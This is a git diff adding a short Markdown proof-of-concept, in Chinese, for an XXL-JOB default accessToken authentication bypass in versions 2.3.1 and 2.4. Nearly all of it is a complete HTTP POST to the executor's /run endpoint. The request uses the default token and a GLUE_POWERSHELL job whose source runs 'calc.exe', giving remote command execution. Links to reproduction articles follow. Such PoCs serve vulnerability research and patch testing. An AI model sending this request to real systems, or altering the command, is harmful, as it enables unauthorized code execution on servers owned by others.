diff --git a/XXL-JOB默认accessToken身份绕过漏洞.md b/XXL-JOB默认accessToken身份绕过漏洞.md
new file mode 100644
index 0000000..e8362a7
--- /dev/null
+++ b/XXL-JOB默认accessToken身份绕过漏洞.md
@@ -0,0 +1,48 @@
+## XXL-JOB默认accessToken身份绕过漏洞
+
+
+## 漏洞影响
+```
+2.3.1和2.4
+```
+
+## poc
+```
+POST /run HTTP/1.1
+Host: 127.0.0.1:9999
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+XXL-JOB-ACCESS-TOKEN: default_token
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Content-Length: 365
+
+{
+  "jobId": 1,
+  "executorHandler": "demoJobHandler",
+  "executorParams": "demoJobHandler",
+  "executorBlockStrategy": "SERIAL_EXECUTION",
+  "executorTimeout": 0,
+  "logId": 1,
+  "logDateTime": 1586629003729,
+  "glueType": "GLUE_POWERSHELL",
+  "glueSource": "calc.exe",
+  "glueUpdatetime": 1586699003758,
+  "broadcastIndex": 0,
+  "broadcastTotal": 0
+}
+```
+
+## 漏洞复现
+```
+https://mp.weixin.qq.com/s/9vcIRCbKyisFq3vPXmiMkQ
+https://www.cnblogs.com/chm0d/p/17805168.html
+```
+